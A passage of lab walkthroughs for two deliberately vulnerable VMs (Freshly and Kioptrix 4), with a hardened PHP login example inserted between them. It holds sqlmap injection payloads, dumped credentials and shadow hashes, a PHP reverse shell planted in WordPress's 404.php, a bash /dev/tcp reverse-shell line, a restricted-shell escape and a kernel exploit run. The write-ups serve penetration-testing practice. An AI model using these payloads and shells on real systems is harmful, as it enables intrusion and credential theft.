[23:46:09] [INFO] testing 'PostgreSQL inline queries'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[23:46:09] [INFO] testing 'Oracle inline queries'
[23:46:09] [INFO] testing 'SQLite inline queries'
[23:46:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:46:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:46:09] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[23:46:19] [INFO] POST parameter 'user' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable
[23:46:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:46:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:46:20] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[23:46:23] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[23:46:23] [INFO] testing 'Generic UNION query (88) - 1 to 20 columns'
[23:46:23] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 133 HTTP(s) requests:
---
Parameter: user (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit
---
[23:46:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
[23:46:45] [INFO] fetching tables for database: 'wordpress8080'
[23:46:45] [INFO] fetching number of tables for database 'wordpress8080'
[23:46:45] [INFO] retrieved:
[23:46:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
1
[23:46:54] [INFO] retrieved:
[23:47:04] [INFO] adjusting time delay to 1 second due to good response times
users
[23:47:21] [INFO] fetching columns for table 'users' in database 'wordpress8080'
[23:47:21] [INFO] retrieved: 2
[23:47:23] [INFO] retrieved: username
[23:47:53] [INFO] retrieved: password
[23:48:28] [INFO] fetching entries for table 'users' in database 'wordpress8080'
[23:48:28] [INFO] fetching number of entries for table 'users' in database 'wordpress8080'
[23:48:28] [INFO] retrieved: 1
[23:48:29] [INFO] retrieved: SuperSecretPassword
[23:49:44] [INFO] retrieved: admin
[23:50:03] [INFO] analyzing table dump for possible password hashes
Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+


[23:50:03] [INFO] table 'wordpress8080.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.11/dump/wordpress8080/users.csv'
[23:50:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'

[*] shutting down at 23:50:03

root@kali:~#

________________________________________________________________________________

Let's use the newfound credentials:


Bingo:



Now, I have used multiple ways to get a shell while hacking WordPress, often by uploading a plugin that allows modification of file types when .php extensions are blocked. Yes, that was the case here as well. (Also, the Cart66 SQL injection exploit may work now as well.) However, a good friend brought the obvious thing to my attention: "Why go through the trouble of uploading a plugin, potentially leaving tracks, when you can just update an existing page within WordPress with your own PHP code?" I had no logical answer. So I did it, and it was much easier.

For those of you who are familiar with Kali, there are web shells for most of your needs in the following directory:

/usr/share/webshells/php


Penetration


The php-reverse-shell.php is identical to the one hosted by pentestmonkey. I was able to simply cut and paste the contents of the file into the 404.php page in WordPress.

There is one aspect of the shell which needs to be modified to match your attacking machine address:

$ip = '10.1.1.5';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

After starting a netcat listener on port 1234 and browsing to the now malicious 404.php page, the reverse shell is executed:


Now that we have a limited shell, we'll need to break out of it into a proper interactive one. Whenever possible, I use the following Python shell escape sequence:

python -c 'import pty; pty.spawn("/bin/bash")'

Here are a couple of other valuable shell escape sequences, since Python won't always be at your disposal:

bash -i >& /dev/tcp/192.168.22.10/443 0>&1
/bin/sh -i

and... generating a keypair and copying the public key into the authorized_keys file on the victim; more to come on this in a separate write-up.

Once I had a decent shell, things moved pretty quickly due to the overly permissive permissions on the /etc/shadow file (readable by the unprivileged daemon account):


$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@Freshly:/$

daemon@Freshly:/$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@Freshly:/$

daemon@Freshly:/$ uname -a
uname -a
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
daemon@Freshly:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/$ cat /etc/shadow
cat /etc/shadow
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
daemon:*:16483:0:99999:7:::
bin:*:16483:0:99999:7:::
sys:*:16483:0:99999:7:::
sync:*:16483:0:99999:7:::
games:*:16483:0:99999:7:::
man:*:16483:0:99999:7:::
lp:*:16483:0:99999:7:::
mail:*:16483:0:99999:7:::
news:*:16483:0:99999:7:::
uucp:*:16483:0:99999:7:::
proxy:*:16483:0:99999:7:::
www-data:*:16483:0:99999:7:::
backup:*:16483:0:99999:7:::
list:*:16483:0:99999:7:::
irc:*:16483:0:99999:7:::
gnats:*:16483:0:99999:7:::
nobody:*:16483:0:99999:7:::
libuuid:!:16483:0:99999:7:::
syslog:*:16483:0:99999:7:::
messagebus:*:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
# YOU STOLE MY PASSWORD FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/$ 


___________________________________________________________________


This was probably enough to satisfy the requirements of the challenge, but I continued.

I ran John against the password hashes using my favorite wordlist:


I probably didn't have to, but I logged in as the cracked user "candycane".

Running an enumeration script, I found that the login.php file had database credentials hard-coded in it:

candycane@Freshly:/var/www/html$ cat login.php
cat login.php
mysql_connect('localhost','root','SuperSecretPassword');
mysql_select_db('login');
?>

Same password as WordPress; nobody does that, yeah right...

So I logged in as the DB root user with these credentials and enumerated a bit more:


candycane@Freshly:/var/www/html$ mysql --user=root --password=SuperSecretPassword wordpress8080
d wordpress8080ot --password=SuperSecretPasswor
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4886
Server version: 5.5.41-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>


mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| login              |
| mysql              |
| performance_schema |
| phpmyadmin         |
| users              |
| wordpress8080      |
+--------------------+
7 rows in set (0.00 sec)

mysql> show tables from login;
show tables from login;
+-----------------+
| Tables_in_login |
+-----------------+
| user_name       |
| users           |
+-----------------+
2 rows in set (0.00 sec)

mysql> use login;
use login;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from users;
select * from users;
+-----------+----------+
| user_name | password |
+-----------+----------+
| candyshop | password |
| Sir       | PopRocks |
+-----------+----------+
2 rows in set (0.00 sec)

mysql>

______________________________________________________________________________


So this yielded a little more information. I chose not to continue enumerating and decided to try the same reused password for the root account, and bingo!

I pwned the box:


Overall, I enjoyed this VM challenge due to its realism. Some challenges are fun and thought provoking, but I enjoy the ones that mimic real-world systems and human mistakes. Thanks to the guys at Top-Hat-Sec.

Court Graham, CISSP, OSCP, CEH, PCI-QSA, ITIL 


Friday, May 22, 2015

Kioptrix Level 4 Walkthrough


This is the first in a long series of Vulnerable Virtual Machine walkthroughs that I'll be posting to this site. By looking at the date of my last post, one would assume that I've gone dormant, but that's definitely not the case. So without further ado, I bring you Kioptrix Level 4.

Enumeration

root@kali:~# nmap 10.1.1.10
Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-21 09:05 EDT
Nmap scan report for 10.1.1.10
Host is up (0.00032s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:C2:50:41 (Cadmus Computer Systems)


Nmap done: 19 IP addresses (3 hosts up) scanned in 9.10 seconds
root@kali:~#


Visiting the web page on port 80 revealed a login page which may be vulnerable to some SQL injection:

Using a bunch of the usual combinations, I was able to provoke the site into revealing the underlying DBMS (MySQL). With this information I was able to specify the DBMS in my sqlmap invocation (--dbms=MySQL). sqlmap output:

root@kali:~# sqlmap -u "http://10.1.1.10/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:14:03

[09:14:03] [INFO] testing connection to the target URL
[09:14:04] [INFO] heuristics detected web page charset 'ascii'
[09:14:04] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:14:05] [INFO] target URL is stable
[09:14:05] [INFO] testing if POST parameter 'myusername' is dynamic
[09:14:05] [WARNING] POST parameter 'myusername' does not appear dynamic
[09:14:05] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[09:14:05] [INFO] testing for SQL injection on POST parameter 'myusername'
[09:14:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[09:14:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[09:14:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:14:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[09:14:09] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[09:14:10] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:14:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[09:14:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[09:14:10] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[09:14:10] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[09:14:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[09:14:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[09:14:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:14:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[09:14:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[09:14:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[09:14:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[09:14:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[09:14:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
Blah, blah, blah... ultimately revealing usernames and passwords within the underlying database:
Place: POST
Parameter: mypassword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-4827' OR (7207=7207) AND 'wyxA'='wyxA

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: myusername=admin&mypassword=test' AND 8831=BENCHMARK(5000000,MD5(0x46556262)) AND 'KxNZ'='KxNZ
---
[09:16:14] [INFO] testing MySQL
[09:16:14] [INFO] confirming MySQL
[09:16:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[09:16:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:16:14] [INFO] fetching current database
[09:16:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:16:14] [INFO] retrieved: members
[09:16:15] [INFO] fetching tables for database: 'members'
[09:16:15] [INFO] fetching number of tables for database 'members'
[09:16:15] [INFO] retrieved: 1
[09:16:15] [INFO] retrieved: members
[09:16:15] [INFO] fetching columns for table 'members' in database 'members'
[09:16:15] [INFO] retrieved: 3
[09:16:15] [INFO] retrieved: id
[09:16:16] [INFO] retrieved: username
[09:16:16] [INFO] retrieved: password
[09:16:17] [INFO] fetching entries for table 'members' in database 'members'
[09:16:17] [INFO] fetching number of entries for table 'members' in database 'members'
[09:16:17] [INFO] retrieved: 2
[09:16:17] [INFO] retrieved: 1
[09:16:17] [INFO] retrieved: MyNameIsJohn
[09:16:18] [INFO] retrieved: john
[09:16:18] [INFO] retrieved: 2
[09:16:19] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[09:16:20] [INFO] retrieved: robert
[09:16:21] [INFO] analyzing table dump for possible password hashes
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+

[09:16:21] [INFO] table 'members.members' dumped to CSV file '/usr/share/sqlmap/output/10.1.1.10/dump/members/members.csv'
[09:16:21] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/10.1.1.10'

[*] shutting down at 09:16:21

root@kali:~#
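Both login pages on this page fail the same way: a query built from the POST parameters (hence the time-based and boolean-based injections sqlmap found), plaintext passwords in the users/members tables, and, in the Freshly login.php above, the MySQL root credentials hard-coded in the web root. The following is an added example of a hardened login.php, not code from either VM or from the walkthrough author; it assumes a hypothetical schema (database `login`, table users(user_name, password_hash)), a least-privilege DB account `login_app`, and its password supplied in the LOGIN_DB_PASSWORD environment variable.

```php
<?php
// Added example (not code from either VM or the walkthrough author).
// Assumed, hypothetical: database `login`, table
// users(user_name VARCHAR, password_hash VARCHAR), a least-privilege
// DB account `login_app` whose password comes from the environment.
declare(strict_types=1);

session_start();

// 1. No hard-coded root credentials in the web root. The app connects as
//    a low-privilege user, so even a successful injection cannot read the
//    wordpress8080 or mysql databases the way the DB root login above could.
$dbPassword = getenv('LOGIN_DB_PASSWORD');
if ($dbPassword === false) {
    http_response_code(500);
    exit('database credentials not configured');
}

$pdo = new PDO(
    'mysql:host=localhost;dbname=login;charset=utf8mb4',
    'login_app',
    $dbPassword,
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
    ]
);

// 2. Parameterised lookup. The user name is bound as data, so the
//    "' AND (SELECT ... SLEEP(5)) ..." payload sqlmap used above is just
//    a literal (non-existent) user name instead of becoming SQL.
function findPasswordHash(PDO $pdo, string $userName): ?string
{
    $stmt = $pdo->prepare(
        'SELECT password_hash FROM users WHERE user_name = ? LIMIT 1'
    );
    $stmt->execute([$userName]);
    $hash = $stmt->fetchColumn();
    return $hash === false ? null : (string) $hash;
}

// 3. Passwords are verified against salted hashes (password_hash() at
//    registration), so a table dump no longer yields "SuperSecretPassword"
//    or "MyNameIsJohn" in the clear. For unknown users a dummy hash is
//    still verified so response time does not reveal which names exist.
function checkLogin(PDO $pdo, string $userName, string $password): bool
{
    static $dummyHash = null;
    $dummyHash ??= password_hash('not-a-real-password', PASSWORD_DEFAULT);

    $hash = findPasswordHash($pdo, $userName);
    if ($hash === null) {
        password_verify($password, $dummyHash); // burn the same time
        return false;
    }
    return password_verify($password, $hash);
}

$user = (string) ($_POST['user'] ?? '');
$pass = (string) ($_POST['password'] ?? '');

if (checkLogin($pdo, $user, $pass)) {
    session_regenerate_id(true);   // defeat session fixation
    $_SESSION['user'] = $user;
    echo 'login ok';
} else {
    http_response_code(401);       // same message for bad user or password
    echo 'invalid credentials';
}
```

With a separate MySQL account for the WordPress site and a different password for the OS root account, the credential reuse that finished both boxes would also stop working.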


Now let's attempt to SSH in with john's credentials:

root@kali:~# ssh john@10.1.1.10
The authenticity of host '10.1.1.10 (10.1.1.10)' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.10' (RSA) to the list of known hosts.
john@10.1.1.10's password:
Connection closed by 10.1.1.10
root@kali:~# ssh john@10.1.1.10
john@10.1.1.10's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls

Awesome, the credentials worked, but now we're trapped in a stupid restricted shell..... how do we escape?

Research on how to escape this shell led me to the following web page:

http://www.aldeid.com/wiki/Lshell

Worked like a charm!

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$


john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Now it's time to take a look around and escalate privileges; it looks like this Linux kernel is vulnerable to some of the old favorites.

john@Kioptrix4:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied
john@Kioptrix4:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
john@Kioptrix4:~$ pwd
/home/john
john@Kioptrix4:~$ ls
john@Kioptrix4:~$ cd ..
john@Kioptrix4:/home$ ls
john  loneferret  robert
john@Kioptrix4:/home$ cd loneferret
john@Kioptrix4:/home/loneferret$ ls
john@Kioptrix4:/home/loneferret$ ls -al
total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root       root       4096 2012-02-04 18:05 ..
-rw------- 1 loneferret loneferret   62 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 loneferret loneferret  220 2012-02-04 09:58 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r--r-- 1 loneferret loneferret    1 2012-02-05 10:37 .lhistory
-rw------- 1 root       root         68 2012-02-04 10:05 .my.cnf.5086
-rw------- 1 root       root          1 2012-02-04 10:05 .mysql.5086
-rw------- 1 loneferret loneferret    1 2012-02-05 10:38 .mysql_history
-rw------- 1 loneferret loneferret    9 2012-02-06 16:39 .nano_history
-rw-r--r-- 1 loneferret loneferret  586 2012-02-04 09:58 .profile
-rw-r--r-- 1 loneferret loneferret    0 2012-02-04 10:01 .sudo_as_admin_successful
john@Kioptrix4:/home/loneferret$ more .sudo_as_admin_successful
john@Kioptrix4:/home/loneferret$ more .bash_history
.bash_history: Permission denied

As you can see, I came across lots of interesting things, including MySQL and nice stuff in user directories, but it was my old faithful Linux sendpage exploit that brought home the bacon.


john@Kioptrix4:~$ ./sendpage
#